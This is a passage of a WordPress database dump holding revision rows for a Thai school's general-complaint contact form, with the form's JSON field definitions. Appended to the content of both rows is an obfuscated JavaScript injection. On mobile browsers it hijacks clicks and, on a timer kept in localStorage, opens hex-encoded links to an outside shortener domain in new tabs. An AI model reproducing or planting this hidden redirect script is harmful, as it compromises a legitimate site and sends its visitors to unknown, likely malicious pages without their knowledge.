_0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ร้องเรียนเรื่องทั่วไป','','inherit','closed','closed','','486-revision-v1','','','2024-08-02 11:44:42','2024-08-02 04:44:42','',486,'http://pakhaeng.ssk.in.th/?p=487',0,'revision','',0),
(488,1,'2024-08-02 11:49:21','2024-08-02 04:49:21','{\"fields\":{\"1\":{\"id\":\"1\",\"type\":\"name\",\"label\":\"\\u0e0a\\u0e37\\u0e48\\u0e2d-\\u0e2a\\u0e01\\u0e38\\u0e25 \\u0e1c\\u0e39\\u0e49\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"format\":\"first-last\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"simple_placeholder\":\"\",\"simple_default\":\"\",\"first_placeholder\":\"\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"\",\"last_default\":\"\",\"css\":\"\"},\"2\":{\"id\":\"2\",\"type\":\"textarea\",\"label\":\"\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e39\\u0e48\",\"description\":\"\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"css\":\"\"},\"3\":{\"id\":\"3\",\"type\":\"text\",\"label\":\"\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"input_mask\":\"\",\"css\":\"\"},\"4\":{\"id\":\"4\",\"type\":\"textarea\",\"label\":\"\\u0e23\\u0e32\\u0e22\\u0e25\\u0e30\\u0e40\\u0e2d\\u0e35\\u0e22\\u0e14\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"css\":\"\"},\"5\":{\"id\":\"5\",\"type\":\"number\",\"label\":\"\\u0e40\\u0e1a\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e17\\u0e23\\u0e28\\u0e31\\u0e1e\\u0e17\\u0e4c (\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e15\\u0e34\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49)\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"6\":{\"id\":\"6\",\"type\":\"checkbox\",\"label\":\"\\u0e02\\u0e49\\u0e32\\u0e1e\\u0e40\\u0e08\\u0e49\\u0e32\\u0e02\\u0e2d\\u0e23\\u0e31\\u0e1a\\u0e23\\u0e2d\\u0e07\\u0e27\\u0e48\\u0e32\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07\\u0e17\\u0e38\\u0e01\\u0e1b\\u0e23\\u0e30\\u0e01\\u0e32\\u0e23 \\u0e2b\\u0e32\\u0e01\\u0e1b\\u0e23\\u0e32\\u0e01\\u0e0e\\u0e27\\u0e48\\u0e32\\u0e44\\u0e21\\u0e48\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e02\\u0e49\\u0e32\\u0e1e\\u0e40\\u0e08\\u0e49\\u0e32\\u0e22\\u0e2d\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e34\\u0e14 \\u0e41\\u0e25\\u0e30\\u0e43\\u0e2b\\u0e49\\u0e14\\u0e33\\u0e40\\u0e19\\u0e34\\u0e19\\u0e01\\u0e32\\u0e23\\u0e15\\u0e32\\u0e21\\u0e01\\u0e0e\\u0e2b\\u0e21\\u0e32\\u0e22\",\"choices\":{\"1\":{\"label\":\"\\u0e22\\u0e2d\\u0e1a\\u0e23\\u0e31\\u0e1a\\u0e02\\u0e49\\u0e2d\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"}},\"choices_images_style\":\"modern\",\"choices_icons_color\":\"#066aab\",\"choices_icons_size\":\"large\",\"choices_icons_style\":\"default\",\"description\":\"\",\"input_columns\":\"\",\"choice_limit\":\"\",\"dynamic_choices\":\"\",\"css\":\"\"}},\"id\":\"486\",\"field_id\":7,\"settings\":{\"form_title\":\"\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b\",\"form_desc\":\"\",\"submit_text\":\"\\u0e2a\\u0e48\\u0e07\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"submit_text_processing\":\"Sending...\",\"form_class\":\"\",\"submit_class\":\"\",\"ajax_submit\":\"1\",\"notification_enable\":\"1\",\"notifications\":{\"1\":{\"email\":\"{admin_email}\",\"subject\":\"New \\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b Entry\",\"sender_name\":\"\\u0e42\\u0e23\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e1a\\u0e49\\u0e32\\u0e19\\u0e2b\\u0e19\\u0e2d\\u0e07\\u0e1b\\u0e25\\u0e32\\u0e40\\u0e02\\u0e47\\u0e07-\\u0e01\\u0e2d\\u0e44\\u0e2b\\u0e25\\u0e48\",\"sender_address\":\"{admin_email}\",\"replyto\":\"\",\"message\":\"{all_fields}\",\"template\":\"\"}},\"confirmations\":{\"1\":{\"type\":\"message\",\"message\":\"<p>Thanks for contacting us! We will be in touch with you shortly.<\\/p>\",\"message_scroll\":\"1\",\"page\":\"459\",\"redirect\":\"\"}},\"antispam\":\"1\",\"anti_spam\":{\"time_limit\":{\"duration\":\"3\"}},\"form_tags\":[],\"store_spam_entries\":\"0\"},\"search_terms\":\"\",\"meta\":{\"template\":\"blank\"}}\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ร้องเรียนเรื่องทั่วไป','','inherit','closed','closed','','486-revision-v1','','','2024-08-02 11:49:21','2024-08-02 04:49:21','',486,'http://pakhaeng.ssk.in.th/?p=488',0,'revision','',0),
